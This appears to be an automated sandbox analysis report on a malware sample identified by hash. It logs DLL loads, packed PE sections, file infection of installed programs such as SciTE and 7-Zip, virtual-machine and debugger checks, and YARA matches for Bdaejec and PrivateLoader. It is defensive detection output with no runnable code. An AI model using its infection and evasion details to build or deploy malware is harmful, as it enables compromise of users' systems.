              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeUnpacked PE file: 1.2.vXQpuA.exe.610000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: ku
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: section name: ku
              Source: vXQpuA.exe.0.drStatic PE information: section name: .aspack
              Source: vXQpuA.exe.0.drStatic PE information: section name: .adata
              Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
              Source: MyProg.exe.1.drStatic PE information: section name: PELIB
              Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
              Source: SciTE.exe.1.drStatic PE information: section name: u
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00376E7B push ebp; ret 0_2_00376E7E
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00376E7A push ebp; ret 0_2_00376E7E
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00349EC6 push ecx; ret 0_2_00349ED9
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_00616076 push 006114E1h; ret 1_2_00616425
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_00611638 push dword ptr [00613084h]; ret 1_2_0061170E
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_0061600A push ebp; ret 1_2_0061600D
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_00612D9B push ecx; ret 1_2_00612DAB
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: section name: ku entropy: 6.934525403554348
              Source: vXQpuA.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
              Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.934606960353715
              Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.934533938780926
              Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.9351052031329194

              Persistence and Installation Behavior

              barindex
              Infects executable files (exe, dll, sys, html)
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeFile created: C:\Users\user\AppData\Local\Temp\vXQpuA.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003202C0 StartServiceCtrlDispatcherA,0_2_003202C0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00343C20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00343C20
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-1169
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-910
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeAPI coverage: 4.9 %
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_00611718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00611754h1_2_00611718
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00357261 FindFirstFileExW,0_2_00357261
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_006129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_006129E2
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_00612B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00612B8C
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(g
              Source: Amcache.hve.5.drBinary or memory string: VMware
              Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWo
              Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.5.drBinary or memory string: vmci.sys
              Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.5.drBinary or memory string: VMware20,1
              Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeAPI call chain: ExitProcess graph end nodegraph_1-885
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00349C79 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00349C79
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00374044 mov eax, dword ptr fs:[00000030h]0_2_00374044
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00352633 mov eax, dword ptr fs:[00000030h]0_2_00352633
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00356EFD mov eax, dword ptr fs:[00000030h]0_2_00356EFD
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003581A7 GetProcessHeap,0_2_003581A7
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00349359 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00349359
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00349C79 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00349C79
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0034CD36 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0034CD36
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00349E0F SetUnhandledExceptionFilter,0_2_00349E0F
              Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00349A99 cpuid 0_2_00349A99
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00349EE1 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00349EE1
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003219B0 LoadLibraryA,LoadLibraryA,__aulldiv,Sleep,GetModuleFileNameA,GetUserNameA,DeleteFileA,operator!=,__aulldiv,_strstr,operator!=,_strstr,ShellExecuteA,WinExec,WinExec,0_2_003219B0
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_0061139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_0061139F
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Bdaejec
              Source: Yara matchFile source: Process Memory Space: vXQpuA.exe PID: 5064, type: MEMORYSTR
              Yara detected PrivateLoader
              Source: Yara matchFile source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected Bdaejec
              Source: Yara matchFile source: Process Memory Space: vXQpuA.exe PID: 5064, type: MEMORYSTR
              Yara detected PrivateLoader
              Source: Yara matchFile source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00312010 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00312010

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
